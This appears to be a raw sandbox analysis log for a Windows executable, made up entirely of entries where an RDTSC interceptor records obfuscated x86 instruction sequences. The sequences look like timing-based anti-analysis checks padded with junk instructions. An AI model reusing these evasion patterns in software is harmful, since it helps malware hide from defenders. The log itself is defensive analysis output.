Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6008B second address: 4F600A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBD1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90EF3 second address: 4F90EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90EF9 second address: 4F90F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F4DCCF8FBCCh 0x00000012 pushfd 0x00000013 jmp 00007F4DCCF8FBD2h 0x00000018 sub ax, 62E8h 0x0000001d jmp 00007F4DCCF8FBCBh 0x00000022 popfd 0x00000023 pop ecx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 movsx edx, ax 0x0000002a popad 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4DCCF8FBD3h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90F5E second address: 4F90F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4DCCCB3CDDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30124 second address: 4F30132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30132 second address: 4F30185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cl, 43h 0x0000000c mov ebx, 28ADF21Ch 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F4DCCCB3CDBh 0x00000018 mov ebp, esp 0x0000001a jmp 00007F4DCCCB3CE6h 0x0000001f push dword ptr [ebp+04h] 0x00000022 pushad 0x00000023 mov si, CDBDh 0x00000027 mov dx, cx 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f mov edx, esi 0x00000031 mov edi, eax 0x00000033 popad 0x00000034 push dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50C88 second address: 4F50C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50C8C second address: 4F50C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50C9A second address: 4F50C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50C9E second address: 4F50CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50CB9 second address: 4F50CEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DCCF8FBCFh 0x00000009 sbb ecx, 500C4C8Eh 0x0000000f jmp 00007F4DCCF8FBD9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F507C6 second address: 4F507CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F507CC second address: 4F50832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4DCCF8FBCEh 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4DCCF8FBD1h 0x00000019 add eax, 21294216h 0x0000001f jmp 00007F4DCCF8FBD1h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4DCCF8FBCEh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50832 second address: 4F50857 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 3B1DD611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4DCCCB3CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50857 second address: 4F5085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5085B second address: 4F50861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50861 second address: 4F50872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F5076C second address: 4F50770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50770 second address: 4F50776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50776 second address: 4F50797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DCCCB3CDCh 0x00000009 add ah, FFFFFFB8h 0x0000000c jmp 00007F4DCCCB3CDBh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F503E3 second address: 4F50480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F4DCCF8FBD3h 0x00000012 adc si, F4CEh 0x00000017 jmp 00007F4DCCF8FBD9h 0x0000001c popfd 0x0000001d pop ecx 0x0000001e mov bx, 13C4h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007F4DCCF8FBD4h 0x0000002d pop eax 0x0000002e pushfd 0x0000002f jmp 00007F4DCCF8FBCBh 0x00000034 or ah, FFFFFF8Eh 0x00000037 jmp 00007F4DCCF8FBD9h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60378 second address: 4F6037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6037E second address: 4F6039F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 34437113h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4DCCF8FBD1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6039F second address: 4F603BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4DCCCB3CE2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70579 second address: 4F7057F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7057F second address: 4F70583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70583 second address: 4F70587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70587 second address: 4F705A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4DCCCB3CE4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F705A8 second address: 4F7062E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c jmp 00007F4DCCF8FBD6h 0x00000011 and dword ptr [eax+04h], 00000000h 0x00000015 pushad 0x00000016 mov bx, si 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4DCCF8FBD8h 0x00000020 sub esi, 2C017E38h 0x00000026 jmp 00007F4DCCF8FBCBh 0x0000002b popfd 0x0000002c call 00007F4DCCF8FBD8h 0x00000031 pop eax 0x00000032 popad 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F4DCCF8FBCCh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7000A second address: 4F7000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7000F second address: 4F7002C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7002C second address: 4F70030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70030 second address: 4F70034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70034 second address: 4F7003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7003A second address: 4F7004B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 53786BB1h 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7035A second address: 4F70369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90649 second address: 4F9064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F9064D second address: 4F90653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90653 second address: 4F90662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBCBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90662 second address: 4F906D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4DCCCB3CDEh 0x00000011 push eax 0x00000012 pushad 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4DCCCB3CE4h 0x0000001f or ch, FFFFFFB8h 0x00000022 jmp 00007F4DCCCB3CDBh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a pop esi 0x0000002b pop edx 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F4DCCCB3CDDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F9083D second address: 4F90897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4DCCF8FBCCh 0x00000012 sbb si, B808h 0x00000017 jmp 00007F4DCCF8FBCBh 0x0000001c popfd 0x0000001d mov esi, 7C803E7Fh 0x00000022 popad 0x00000023 leave 0x00000024 jmp 00007F4DCCF8FBD2h 0x00000029 retn 0004h 0x0000002c nop 0x0000002d mov esi, eax 0x0000002f lea eax, dword ptr [ebp-08h] 0x00000032 xor esi, dword ptr [00AE2014h] 0x00000038 push eax 0x00000039 push eax 0x0000003a push eax 0x0000003b lea eax, dword ptr [ebp-10h] 0x0000003e push eax 0x0000003f call 00007F4DD1480395h 0x00000044 push FFFFFFFEh 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90897 second address: 4F9089D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F9089D second address: 4F908EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F4DCCF8FBD0h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007F4DD14803C6h 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a jmp 00007F4DCCF8FBCEh 0x0000001f mov edx, eax 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F4DCCF8FBCCh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F908EF second address: 4F908F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F908F3 second address: 4F908F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F908F7 second address: 4F908FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F908FD second address: 4F90913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBD2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90913 second address: 4F90917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F90917 second address: 4F9095F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4DCCF8FBD7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edi, cx 0x00000016 pushfd 0x00000017 jmp 00007F4DCCF8FBCCh 0x0000001c sbb eax, 7AD1D648h 0x00000022 jmp 00007F4DCCF8FBCBh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40011 second address: 4F4004C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F4DCCCB3CE8h 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4DCCCB3CE7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4004C second address: 4F4007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov eax, 7890D183h 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4007B second address: 4F4007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4007F second address: 4F40085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40085 second address: 4F4008B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4008B second address: 4F4008F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4008F second address: 4F40122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b mov eax, edx 0x0000000d pop edx 0x0000000e mov si, 3B51h 0x00000012 popad 0x00000013 mov dword ptr [esp], ecx 0x00000016 jmp 00007F4DCCCB3CDCh 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov eax, 4D6721FDh 0x00000022 mov ax, E0F9h 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F4DCCCB3CDFh 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F4DCCCB3CE6h 0x00000033 mov ebx, dword ptr [ebp+10h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov ebx, 23B08B50h 0x0000003e pushfd 0x0000003f jmp 00007F4DCCCB3CE9h 0x00000044 and esi, 08FE63D6h 0x0000004a jmp 00007F4DCCCB3CE1h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40122 second address: 4F40128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40128 second address: 4F4012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4012C second address: 4F401C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4DCCF8FBD6h 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edi, si 0x00000016 pushfd 0x00000017 jmp 00007F4DCCF8FBCAh 0x0000001c add al, FFFFFF88h 0x0000001f jmp 00007F4DCCF8FBCBh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 push esi 0x00000029 pushfd 0x0000002a jmp 00007F4DCCF8FBCBh 0x0000002f add cx, 6FCEh 0x00000034 jmp 00007F4DCCF8FBD9h 0x00000039 popfd 0x0000003a pop ecx 0x0000003b mov ah, bl 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F4DCCF8FBCFh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F401C2 second address: 4F401EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4DCCCB3CDDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F401EF second address: 4F40244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F4DCCF8FBD3h 0x0000000c sub cx, B89Eh 0x00000011 jmp 00007F4DCCF8FBD9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F4DCCF8FBD1h 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40244 second address: 4F4024A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4024A second address: 4F40250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40250 second address: 4F40254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40254 second address: 4F402AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e movzx ecx, dx 0x00000011 pushfd 0x00000012 jmp 00007F4DCCF8FBD3h 0x00000017 or esi, 45E7B8BEh 0x0000001d jmp 00007F4DCCF8FBD9h 0x00000022 popfd 0x00000023 popad 0x00000024 je 00007F4E3EF7DF3Ah 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F402AD second address: 4F402B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F402B1 second address: 4F402C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F402C4 second address: 4F4034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F4DCCCB3CDEh 0x00000015 je 00007F4E3ECA200Bh 0x0000001b pushad 0x0000001c call 00007F4DCCCB3CDEh 0x00000021 mov si, 6951h 0x00000025 pop esi 0x00000026 movsx edi, ax 0x00000029 popad 0x0000002a mov edx, dword ptr [esi+44h] 0x0000002d pushad 0x0000002e mov dl, ah 0x00000030 mov edx, 6CFE5454h 0x00000035 popad 0x00000036 or edx, dword ptr [ebp+0Ch] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F4DCCCB3CE4h 0x00000042 adc cx, F808h 0x00000047 jmp 00007F4DCCCB3CDBh 0x0000004c popfd 0x0000004d push esi 0x0000004e pop ebx 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4034F second address: 4F40397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F4DCCF8FBCEh 0x00000014 jne 00007F4E3EF7DED2h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F4DCCF8FBCDh 0x00000022 pop esi 0x00000023 mov ax, dx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30849 second address: 4F308DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov dl, 93h 0x0000000a pushfd 0x0000000b jmp 00007F4DCCCB3CDEh 0x00000010 and ch, FFFFFFD8h 0x00000013 jmp 00007F4DCCCB3CDBh 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F4DCCCB3CE6h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 call 00007F4DCCCB3CDEh 0x00000028 mov si, 1481h 0x0000002c pop ecx 0x0000002d mov di, C1B2h 0x00000031 popad 0x00000032 and esp, FFFFFFF8h 0x00000035 jmp 00007F4DCCCB3CE9h 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F4DCCCB3CE8h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F308DD second address: 4F308EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F308EC second address: 4F3092B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4DCCCB3CE1h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4DCCCB3CDDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F3092B second address: 4F30931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
